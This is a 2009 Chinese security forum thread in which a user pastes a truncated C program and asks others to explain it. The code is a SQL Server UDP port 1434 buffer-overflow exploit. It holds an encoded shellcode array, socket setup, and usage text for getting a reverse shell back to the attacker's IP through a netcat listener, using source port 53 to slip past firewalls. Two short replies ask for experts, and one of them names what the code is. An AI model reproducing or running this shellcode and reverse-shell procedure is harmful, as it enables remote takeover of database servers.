首页
社区
课程
招聘
[旧帖] [求助]以发一些其它的原代码不 0.00雪花
发表于: 2009-3-15 22:27 2996

[旧帖] [求助]以发一些其它的原代码不 0.00雪花

2009-3-15 22:27
2996
可以发一些其它的原代码不(如C语言)找不到人帮我看一下。能不能发哟不知道是不是违规了
                      #include <stdio.h>
#include <windows.h>
#include <winsock.h>

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;
struct sockaddr_in s_sa;

struct hostent *he;
SOCKET sock;
unsigned int addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="\x04";
char ping[8]="\x02";

char exploit_code[]=
"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"
"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
"\x58";

int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";

if(argc != 2 && argc != 5)
{
  printf("\n\tSQL Server UDP Buffer Overflow\n\n\tReverse Shell Exploit Code");
  printf("\n\n\tUsage:\n\n\tC:\\>%s host your_ip_address your_port sp",argv[0]);
  printf("\n\n\tYou need to set nectat listening on a port");
  printf("\n\tthat you want the reverse shell to connect to");
  printf("\n\n\te.g.\n\n\tC:\\>nc -l -p 53");
  printf("\n\n\tThen run C:\\>%s db.target.com 199.199.199.199 53 0",argv[0]);
  printf("\n\n\tAssuming, of course, your IP address is 199.199.199.199\n");
  printf("\n\tWe set the source UDP port to 53 so this should go through");
  printf("\n\tmost firewalls - looks like a reply to a DNS query. Change");
  printf("\n\tthe source code if you want to modify this.");
  printf("\n\n\tThe SP Level is the SQL Server Service Pack:");
  printf("\n\tWith no service pack the import address entry for");
  printf("\n\tGetProcAddress() shifts by 12 bytes so we need to");
  printf("\n\tchange one byte of the exploit code to reflect this.");
  printf("\n\n\n\tDavid Litchfield\n\tdavid@ngssoftware.com\n\t22nd May 2002\n\n\n\n");
  return 0;
}

strncpy(host,argv[1],250);
if(argc == 5)
{
  strncpy(ipaddress,argv[2],36);
没有写完前面有人看得懂不

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
有没得高手看看
2009-3-16 09:01
0
雪    币: 235
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
sql server udp buffer overflow shell code.
俺不懂请高手来解答
2009-3-16 10:18
0
游客
登录 | 注册 方可回帖
返回
//